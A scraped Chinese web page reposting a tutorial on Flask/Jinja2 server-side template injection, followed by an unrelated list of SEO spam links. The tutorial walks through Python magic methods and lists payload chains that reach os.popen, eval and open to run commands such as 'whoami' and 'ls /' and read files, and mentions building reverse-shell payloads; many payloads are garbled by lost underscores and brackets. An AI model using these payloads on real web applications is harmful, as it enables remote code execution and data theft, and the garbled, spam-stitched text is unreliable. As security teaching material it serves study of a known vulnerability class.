当前位置: 首页 > news >正文

php网站编程百度站长

php网站编程,百度站长,西宁市营销网站建设公司,做黄色网站赚钱么SSTI漏洞注入 SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会…

SSTI漏洞注入

SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会出现模板注入。

注入过程

  1. 确定模板类型
    在这里插入图片描述
  2. 利用魔术方法寻找可命令执行的子类
    魔术方法:
    class 返回类型所属的对象
    mro 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
    base 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的
    subclasses 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
    init 类的初始化方法
    globals 对包含函数全局变量的字典的引用
    寻找子类:
    Python3:
    使用file类读取文件的方法: <class ‘_frozen_importlib_external.FileLoader’>这个类索引号;
    利用os._warp_close类的 popen函数执行命令:
    [].class.mro[-1].subclasses()[128].init.globals’popen’.read()
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘import’.popen(‘whoami’).read()
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘eval’
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘eval’
    利用os._warp_close类的 open函数读取文件:
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘open’.read()
    Python2:
    利用 warnings.WarningMessage的 linecache执行命令:
    [].class.base.subclasses()[59].init.func_globals[‘linecache’].os.popen(‘whoami’).read()
    ().class.bases[0].subclasses()40.read()
    ().class.bases[0].subclasses()[75].init.globals[‘builtins’]‘eval’
    利用file类读取文件(python2特有):
    ().class.bases[0].subclasses()40.read()
    ().class.bases[0].subclasses()40.readlines()
    存在popen函数的类一般是 os._wrap_close
    [].class.mro[-1].subclasses()[128].init.globals[‘builtins’][‘eval’](‘import(“o”+“s”).popen(“ls /”).read()’)
    思路:找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。
    几个含有eval函数的类:
    warnings.catch_warnings
    WarningMessage
    codecs.IncrementalEncoder
    codecs.IncrementalDecoder
    codecs.StreamReaderWriter
    os._wrap_close
    reprlib.Repr
    weakref.finalize
  3. 构造PAYLOAD执行反弹SHELL等命令
    相关链接
http://www.dt0577.cn/news/20734.html

相关文章:

  • 芜湖做网站找哪家好百度信息流是什么
  • 网站建设流程效果优化网站打开速度
  • shortcode wordpress青岛seo用户体验
  • 静态网页制作毕业论文宁波seo企业网络推广
  • 科技有限公司可以做网站建设吗?网站查询工具seo
  • flash 做网站教程电商中seo是什么意思
  • 专门做问卷的调查的网站微信朋友圈软文大全
  • 境外网站百度销售系统登录
  • 织梦57网站的友情链接怎么做企业营销策划是做什么的
  • 电商网站建设功能需求app引流推广方法
  • 如何自己做网站发布到服务器上面新媒体运营师证书
  • 一个可以看qq空间的网站免费的h5制作网站
  • 毕节金海湖新区城乡建设局网站seo 网站优化推广排名教程
  • 996建站网站制作在百度上怎么发布信息
  • 临沂购买模板建站宝鸡seo排名
  • 家庭宽带做网站稳定吗发布平台有哪些
  • 龙潭古镇网站建设自媒体平台排名前十
  • 网站开发会遇到哪些问题河南疫情最新消息
  • 做网站主要学什么营销网络的建设
  • 青田县建设局官方网站如何提高网站在百度的排名
  • 兴扬汽车网站谁做的百度一下免费下载安装
  • 中英文自助网站建设seo实战密码
  • 邢台网站建设公司哪家好一点品牌营销案例
  • 贵阳网站建设王道下拉惠网站建设制作教程
  • seo站长工具是什么杭州网络推广网络优化
  • 国务院建设主管部门网站适合员工的培训课程
  • 网站建设的什么是网站建设的第一阶段推广普通话手抄报图片
  • 中山做网站的app下载注册量推广平台
  • 加快网站速度推广软件免费
  • 福州网站建设资讯淘宝代运营靠谱吗